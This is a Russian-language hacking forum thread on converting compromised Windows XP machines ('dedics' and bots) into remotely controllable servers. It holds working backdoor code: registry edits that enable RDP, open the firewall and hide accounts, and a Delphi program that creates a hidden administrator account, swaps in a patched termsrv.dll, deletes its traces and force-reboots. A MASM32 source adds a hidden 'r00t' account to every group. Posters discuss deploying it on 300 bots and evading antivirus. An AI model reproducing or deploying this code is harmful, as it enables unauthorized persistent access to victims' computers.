нужно было себе, хотел было спросить тут готовое - но пошел по другому пути - разобраться самому и рассказать другим. Включаем "Разрешить удаленный доступ к этому компьютеру" через реестр: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" Выключаем: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Disabled:@xpsp2res.dll,-22009" Bonus: (инфа паблик, но если вам пригодилась первая часть этой темы - может пригодиться и бонус) делаем любую учетку невидимой через "Паналь управления - Учетные записи пользователей" Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] "hidden_account"=dword:00000000 где hidden_account - имя учетки. Примечание: учетка будет невидна только через "Учетные записи пользователей" (Win XP) а так же в меню выбора пользователя при запуске системы. Через "net user", "lusrmgr.msc" и прочие аналогичные админские управлялки её по-прежнему видно. Сабж удачно подходит как лишняя безпалевная полезная нагрузка для вашего софта по управлению собственным компьютером в учебных целях ps. если хоитие поставить на учетку пасс, который не смогут снять за 10-15 минут - ставьте минимально 15 символов. В винде по дефолту пассы учеток хранятся и в виде LM и в NT хэшей, при этом большинство LM хэшей ломается на GPU в течение получаса. За 2 суток же - вообще любой, не зависимо от сложности пасса. НО - для пассов, длиннее 14 символов LM хэши не сохраняются - только NT. Подобрать же (15 символьный) NT хэш, если пасс минимально сложен для своей длинны и не словарный - невозможно. Почему я это говорю? Если на всех своих дедах вы зафигачите одну и ту же учетку с 1 и тем же пассом, и кто-то их других брутеров вдруг запалит эту учетку - он может тупо пробрутить диапазон по ней (я сам так делал ), и снять все ваши деды. Как защиту от этого - юзайте 15-симв. пассы [update]Полный и рабочий код программы см. ниже в посте #12[/update]
А в чем разбор то состоит,что было все было описанно от 2001 года? Про хэши так это времен 93 года =)
я заюзал гугл и не нашел, как включать эту опцию через реестр. дальше промониторил реестр при включении\выключении этой опции, нашел нужные ключи - протестировал и запостил тут. Думаю если этого не знал я, то не знают и многие другие начинающие писатели малвар-софта. И теперь гугл - когда они его спросят - таки даст им ответ
я понимаю желание показать высокий уровень компьютерной грамотности, но не зная того, какой именно ключ отвечает за Разрешение удаленного доступа слабо найти эту страницу? Вообще-то там весь реестр расписан - если знаешь имена нужных ключей. А если не знаешь названий - то либо нужно несколько месяцев читать их все (интересно есть ли те, кто прочил их все), либо обломаться. upd. вообще да, пожалуй можно - если юзать поиск по сайту и писать все по английски. Но тем не менее проще - просто спросить гугл. Ну а на втором месте - протрассировать самому да и вообще возможно кому-то понравится сама идея добавлять такую нагрузку в свой софт - просто и изящно... upd2. в добавок юзер, который нашел таки эту страницу заюзав знания английского и знание названий обпций в Англ. версии винды должен еще и не забыть открыть доступ к порту в виндовом фаере (а о необходимости этого на мелкософте не сказано). Конечно же, если юзер достаточно грамотен - он догадается.... возможно. Но опять же - не проще ли 1. спросить гугл и найти такую статью как эта и не *ть себе мозг 2. протрассировать, чтобы не думать - "не забыл ли я чего" и "блин, почему оно не работает"
По удивлению введя в гугле Enable remote desktop registry ,получаем огромное колличество ссылок и опять же сайт производителя: http://technet.microsoft.com/en-us/library/cc782195(WS.10).aspx И сайт одного из MVP даже в картинках показано: http://oreilly.com/windows/archive/server-hacks-remote-desktop.html
я проапдейтил предыдущий пост. Ну сделал ты это, ну не пашет оно, и чо? На сайте мелкософта написано, что нужно добавлять порт в исключения фаера? И какое количество времени начинающий писатель малвари будет догонять, чо не пашет? Теория есть теория. Кроме того всё, что ты - спренгл - нашел - на английском. Любой кодер просто обязан знать английский в достаточной степени для того, чтобы свободно читать сайт майкрософта и иностранные блоги, да? Все, кто свободно не знает английского, не имеет на машине анлглоязычной версии венды и потому не знает точных названий опций в ней (на англ) + не достаточно екстрасансорен, чтобы понимать, что включив службу, конечно же, нужно не забыть открыть и порт - все они - школота, которой и не нужно писать таких вещей, чтобы не засорять интернет. ? Я так не считаю. пусть себе пишут) update: по запросам "разрешить удаленный доступ к компьютеру" и "разрешить удаленный доступ к компьютеру через реестр" в ру-нете есть только 1 тема с описанием того, как это сделать не "мышкой через меню". эта. и да будет так
Ну так тут дело всё даже не в реестре. Удаленный доступ осуществляется загрузкой сервиса который это делает и разрешение коннекта. ВОт тут вот и кроется вся хря. В твоем случае ты просто разрешаешь коннекты, но не запускаешь сервис. Частенько телнет отрублен.
да... я думал об этом, но не запостил тут. Есть там какой-то ключ и для этого. Допишу и запуск службы upd Code: Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\Admin>net start telnet Системная ошибка 1058. Указанная служба не может быть запущена, поскольку она отключена или все связанн ые с ней устройства отключены. только что запускал на деде, управляя им через RDP. Там как-то по другому вроде. Щас поищу upd2. нашел (прогуглив ключ) на http://forum.hackzona.ru/forum-f16/aaee-t17123.html ("Активация удаленного доступа на Bat") Code: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server\Licensing Core] "EnableConcurrentSessions"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AllowMultipleTSSessions"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0] "Options"=dword:00000000 "Version"=dword:00010001 "DSPath"="LocalGPO" "FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine" "DisplayName"="Политика локальной группы" "Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]" "Link"="Local" "GPOName"="Политика локальной группы" "GPOLink"=dword:00000001 "lParam"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Te rminal Server] "fDenyTSConnections"=dword:00000000 "fEnableSalem"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD] "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000] "Service"="RDPWD" "Legacy"=dword:00000001 "ConfigFlags"=dword:00000000 "Class"="LegacyDriver" "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}" "DeviceDesc"="RDPWD" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_RDPWD\0000\Control] "*NewlyCreated*"=dword:00000000 "ActiveService"="RDPWD" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP] "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000] "Service"="TDTCP" "Legacy"=dword:00000001 "ConfigFlags"=dword:00000000 "Class"="LegacyDriver" "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}" "DeviceDesc"="TDTCP" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\ LEGACY_TDTCP\0000\Control] "*NewlyCreated*"=dword:00000000 "ActiveService"="TDTCP" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\R DPWD\Enum] "0"="Root\\LEGACY_RDPWD\\0000" "Count"=dword:00000001 "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\DomainProfil e\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\S haredAccess\Parameters\FirewallPolicy\StandardProf ile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\T DTCP\Enum] "0"="Root\\LEGACY_TDTCP\\0000" "Count"=dword:00000001 "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server] "fDenyTSConnections"=dword:00000000 "fEnableSalem"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD] "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000] "Service"="RDPWD" "Legacy"=dword:00000001 "ConfigFlags"=dword:00000000 "Class"="LegacyDriver" "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}" "DeviceDesc"="RDPWD" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_RDPWD\0000\Control] "*NewlyCreated*"=dword:00000000 "ActiveService"="RDPWD" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP] "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000] "Service"="TDTCP" "Legacy"=dword:00000001 "ConfigFlags"=dword:00000000 "Class"="LegacyDriver" "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}" "DeviceDesc"="TDTCP" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\R oot\LEGACY_TDTCP\0000\Control] "*NewlyCreated*"=dword:00000000 "ActiveService"="TDTCP" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\RDPWD\Enum] "0"="Root\\LEGACY_RDPWD\\0000" "Count"=dword:00000001 "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\DomainPr ofile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\Standard Profile\GloballyOpenPorts\List] "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TDTCP\Enum] "0"="Root\\LEGACY_TDTCP\\0000" "Count"=dword:00000001 "NextInstance"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t] "asdf"=dword:00000000 чета дофига ключей... надо разбираться, для чего тут половина. upd3. во блин... http://forum.antichat.net/showthread.php?t=36042 а ведь и правда, в XP тока один юзер по дефолту может сидеть! Надо еще и винду патчить... =\
Я rdp открываю так: Code: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 del on_rdp.bat
итак, готово. "На дельфи" программа, более менее эффективно превращающая ПК в Dedicated Server с учетной записью test_account и паролем some_password выглядит так: Code: program Dedic; uses SysUtils,windows; var f:textfile; begin copyfile('object.bin','c:\RECYCLER\temp_dll.tmp',false); assignfile(f,'c:\RECYCLER\temp1.bat'); rewrite(f); writeln(f,'net user test_account some_password /add'); writeln(f,'net user test_account some_password /EXPIRES:NEVER'); writeln(f,'net user test_account /active:yes'); writeln(f,'net localgroup Users test_account /add'); writeln(f,'net localgroup Power Users test_account /add'); writeln(f,'net localgroup Power Backup Operators test_account /add'); writeln(f,'net localgroup Power Remote Desktop Users test_account /add'); writeln(f,'net localgroup Administrators test_account /add'); writeln(f,'chcp 1252'); writeln(f,'net localgroup Администраторы test_account /add'); writeln(f,'chcp 866'); writeln(f,'net localgroup HelpServicesGroup test_account /add'); writeln(f,'md "%SystemDrive%\Documents and Settings\test_account"'); writeln(f,'attrib +r +a +s +h "%SystemDrive%\Documents and Settings\test_account"'); writeln(f,''); writeln(f,''); writeln(f,'echo Windows Registry Editor Version 5.00>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>file.reg'); writeln(f,'echo "Start"=dword:00000002>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services]>>file.reg'); writeln(f,'echo "MaxInstanceCount"=dword:00000064>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]>>file.reg'); writeln(f,'echo "EnableConcurrentSessions"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>file.reg'); writeln(f,'echo "AllowMultipleTSSessions"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History]>>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]>>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]>>file.reg'); writeln(f,'echo "Options"=dword:00000000>>file.reg'); writeln(f,'echo "Version"=dword:00010001>>file.reg'); writeln(f,'echo "DSPath"="LocalGPO">>file.reg'); writeln(f,'echo "FileSysPath"="C:\\WINNT\\System32\\GroupPolicy\\Machine">>file.reg'); writeln(f,'echo "DisplayName"="Политика локальной группы">>file.reg'); writeln(f,'echo "Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]">>file.reg'); writeln(f,'echo "Link"="Local">>file.reg'); writeln(f,'echo "GPOName"="Политика локальной группы">>file.reg'); writeln(f,'echo "GPOLink"=dword:00000001>>file.reg'); writeln(f,'echo "lParam"=dword:00000000>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]>>file.reg'); writeln(f,'echo "fDenyTSConnections"=dword:00000000>>file.reg'); writeln(f,'echo "fEnableSalem"=dword:00000000>>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD]>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD\0000]>>file.reg'); writeln(f,'echo "Service"="RDPWD">>file.reg'); writeln(f,'echo "Legacy"=dword:00000001>>file.reg'); writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg'); writeln(f,'echo "Class"="LegacyDriver">>file.reg'); writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg'); writeln(f,'echo "DeviceDesc"="RDPWD">>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD\0000\Control]>>file.reg'); writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg'); writeln(f,'echo "ActiveService"="RDPWD">>file.reg'); writeln(f,''); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP]>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP\0000]>>file.reg'); writeln(f,'echo "Service"="TDTCP">>file.reg'); writeln(f,'echo "Legacy"=dword:00000001>>file.reg'); writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg'); writeln(f,'echo "Class"="LegacyDriver">>file.reg'); writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg'); writeln(f,'echo "DeviceDesc"="TDTCP">>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_TDTCP\0000\Control]>>file.reg'); writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg'); writeln(f,'echo "ActiveService"="TDTCP">>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RDPWD\Enum]>>file.reg'); writeln(f,'echo "0"="Root\\LEGACY_RDPWD\\0000">>file.reg'); writeln(f,'echo "Count"=dword:00000001>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TDTCP\Enum]>>file.reg'); writeln(f,'echo "0"="Root\\LEGACY_TDTCP\\0000">>file.reg'); writeln(f,'echo "Count"=dword:00000001>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>file.reg'); writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>file.reg'); writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg'); writeln(f,''); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>file.reg'); writeln(f,'echo "fDenyTSConnections"=dword:00000000>>file.reg'); writeln(f,'echo "fEnableSalem"=dword:00000000>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD]>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD\0000]>>file.reg'); writeln(f,'echo "Service"="RDPWD">>file.reg'); writeln(f,'echo "Legacy"=dword:00000001>>file.reg'); writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg'); writeln(f,'echo "Class"="LegacyDriver">>file.reg'); writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg'); writeln(f,'echo "DeviceDesc"="RDPWD">>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RDPWD\0000\Control]>>file.reg'); writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg'); writeln(f,'echo "ActiveService"="RDPWD">>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP]>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP\0000]>>file.reg'); writeln(f,'echo "Service"="TDTCP">>file.reg'); writeln(f,'echo "Legacy"=dword:00000001>>file.reg'); writeln(f,'echo "ConfigFlags"=dword:00000000>>file.reg'); writeln(f,'echo "Class"="LegacyDriver">>file.reg'); writeln(f,'echo "ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}">>file.reg'); writeln(f,'echo "DeviceDesc"="TDTCP">>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TDTCP\0000\Control]>>file.reg'); writeln(f,'echo "*NewlyCreated*"=dword:00000000>>file.reg'); writeln(f,'echo "ActiveService"="TDTCP">>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDPWD\Enum]>>file.reg'); writeln(f,'echo "0"="Root\\LEGACY_RDPWD\\0000">>file.reg'); writeln(f,'echo "Count"=dword:00000001>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TDTCP\Enum]>>file.reg'); writeln(f,'echo "0"="Root\\LEGACY_TDTCP\\0000">>file.reg'); writeln(f,'echo "Count"=dword:00000001>>file.reg'); writeln(f,'echo "NextInstance"=dword:00000001>>file.reg'); writeln(f,''); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>file.reg'); writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg'); writeln(f,'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>file.reg'); writeln(f,'echo "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009">>file.reg'); writeln(f,''); writeln(f,''); writeln(f,'echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>file.reg'); writeln(f,'echo "test_account"=dword:00000000>>file.reg'); writeln(f,''); writeln(f,'REGEDIT /S file.reg'); writeln(f,'DEL /Q file.reg'); writeln(f,''); writeln(f,'ren %SystemRoot%\system32\termsrv.dll termsrv.old'); writeln(f,'del %SystemRoot%\system32\termsrv.old'); writeln(f,'copy c:\RECYCLER\temp_dll.tmp %SystemRoot%\system32\DLLCache\termsrv.dll'); writeln(f,'copy c:\RECYCLER\temp_dll.tmp %SystemRoot%\system32\termsrv.dll'); writeln(f,''); writeln(f,'DEL /Q c:\RECYCLER\temp_dll.tmp'); writeln(f,'shutdown -r -f -t 1'); writeln(f,'DEL /Q c:\RECYCLER\temp1.bat'); closefile(f); assignfile(f,'c:\RECYCLER\temp2.bat'); rewrite(f); writeln(f,'set /a hr=%time:~,2%'); writeln(f,'set /a min=%TIME:~3,2%+15'); writeln(f,'at %hr%:%min% c:\RECYCLER\temp1.bat'); writeln(f,'DEL /Q c:\RECYCLER\temp2.bat'); closefile(f); winexec('c:\RECYCLER\temp2.bat',0); end. где object.bin - переименованная для меньшей подозрительности старая версия библиотеки termsrv.dll, позволяющая коннектиться к ХР-юше сразу многим пользователям. Скачать её можно в гугле или тут (http://errorneo.com/files/termsrv.zip) Код оттестирован на виртуалке и полностью работоспособен. Написан в образовательных целях. post scriptum: writeln(f,'net user test_account /active:yes'); - чтобы было. При некоторых юзернеймах может пригодиться. writeln(f,''); - для красоты. "На дельфи" в кавычках потому, что можно было бы и вообще обойтись без коноплируемого языка - сделав программу из одного единственного батника и либы. Но все же в виде exe оно как-то удобнее
Вот вам исходничек. Писал когдато мож пригодится. MASM32 Code: .586 .model flat,stdcall option casemap:none include windows.inc include kernel32.inc include shell32.inc include netapi32.inc include advapi32.inc include oleaut32.inc includelib kernel32.lib includelib shell32.lib includelib netapi32.lib includelib advapi32.lib includelib oleaut32.lib .data wzUser dw "r","0","0","t",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 wzPass dw "t","0","0","r",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 pwzUser dd offset wzUser d1 dd 0 Err dd 0 Ginfo LOCALGROUP_INFO_1 <0> Uinfo USER_INFO_1 <0> Eread dd 0 Etotal dd 0 hKey dd 0 szTerm db "SYSTEM\CurrentControlSet\Control\Terminal Server",0 szLic db "SYSTEM\\CurrentControlSet\Control\Terminal Server\Licensing Core",0 szSacc db "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList",0 szUsr db "r00t",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 szVal db "fDenyTSConnections",0 szSes db "EnableConcurrentSessions",0 szSrvc db "TermService",0 Zer dd 0 One dd 1 Scm dd 0 Srvc dd 0 Sstat SERVICE_STATUS <0> Sconf QUERY_SERVICE_CONFIG <0> bneed dd ? advpack db "advpack.dll",0 IsAdmin db "IsNTAdmin",0 _IsNTAdmin dd ? hLib dd ? szWin db MAX_PATH dup(?) .code start: ;NT Root ;========================================================================== ;Проверка на привилегии ;======================= invoke LoadLibrary,addr advpack mov hLib,eax invoke GetProcAddress,hLib,addr IsAdmin mov _IsNTAdmin,eax push 0 push 0 call _IsNTAdmin .if eax == 0 jmp error .endif ;================================ ; Заполняем структуру пользователя ;================================ mov Uinfo.usri1_name,offset wzUser mov Uinfo.usri1_password,offset wzPass mov Uinfo.usri1_priv,USER_PRIV_USER mov Uinfo.usri1_flags,UF_SCRIPT or UF_DONT_EXPIRE_PASSWD ;================================ ; Удаляем добавляем пользователя ;================================ invoke NetUserDel,NULL,addr wzUser invoke NetUserAdd,NULL,1,addr Uinfo,addr Err cmp eax,0 jne error ;================================ ; Перечисляем группы ;================================ invoke NetLocalGroupEnum,0,1,addr Ginfo,0fffffffh,addr Eread,addr Etotal,0 cmp eax,0 jne error mov ecx,Eread go: push ecx mov edx,dword ptr [Ginfo] mov edx,dword ptr [edx+ecx*8-8] ;===================================== ; Добавляем пользователя во все группы ;===================================== invoke NetLocalGroupAddMembers,NULL,edx,3,addr pwzUser,1 pop ecx loop go invoke NetApiBufferFree,addr Ginfo ;============================================ ; Добавляем пользователя в состав специальных ;============================================ invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szSacc,0,6,addr hKey invoke RegSetValueEx,hKey,addr szUsr,0,REG_DWORD,addr Zer,sizeof Zer invoke RegCloseKey,hKey ;============================================ ; Разрешаем терминальные подключения ;============================================ invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szTerm,0,6,addr hKey invoke RegSetValueEx,hKey,addr szVal,0,REG_DWORD,addr Zer,sizeof Zer invoke RegCloseKey,hKey invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szLic,0,6,addr hKey invoke RegSetValueEx,hKey,addr szSes,0,REG_DWORD,addr One,sizeof One invoke RegCloseKey,hKey invoke OpenSCManager,0,0,SC_MANAGER_CONNECT mov Scm,eax invoke OpenService,Scm,addr szSrvc,SERVICE_START or SERVICE_QUERY_STATUS or SERVICE_CHANGE_CONFIG mov Srvc,eax ;============================================ ; Запрашивем статус сервиса терминалов ;============================================ invoke QueryServiceConfig,Srvc,NULL,0,addr bneed invoke QueryServiceConfig,Srvc,addr Sconf,bneed,addr bneed cmp Sconf.dwStartType,SERVICE_AUTO_START je autok invoke ChangeServiceConfig,Srvc,-1,SERVICE_AUTO_START,-1,0,0,0,0,0,0,0 autok: invoke QueryServiceStatus,Srvc,addr Sstat cmp Sstat.dwCurrentState,SERVICE_RUNNING ;============================================= ; Если на запушен запускаем ;============================================= je stnreq invoke StartService,Srvc,0,0 stnreq: invoke CloseServiceHandle,Scm ok: invoke ExitProcess,0 error: invoke ExitProcess,1 end start
дайте плиз уже скомпилинный ехе,и еще вопрос: а можно как нибудь прикрутить запрос еще?например ставлю скрипт который собирает ип и если все ровно установилось с прямым ипом то он отстукивается на скрипт,вот так как нибудь можно замутить? просто есть ботов штук 300,хотел их просто прогрузить что бы дедиков из них сделать
а смысл, если любая компиляция начнется палиться ВСЕМИ антивирусами через 2 дня после того, как будет выложена? Даже несмотря на то, что в этом коде нет ничего "вредоносного". Я тут один небольшой рабочий ехе всего 4 людям знакомым дал на тест (ради интереса), так уже через 3 дня ехе палился! Кто-то догадался прогнать вирустоталом! Нет. такие вещи могут распространяться только в исходных кодах и только в учебных целях.
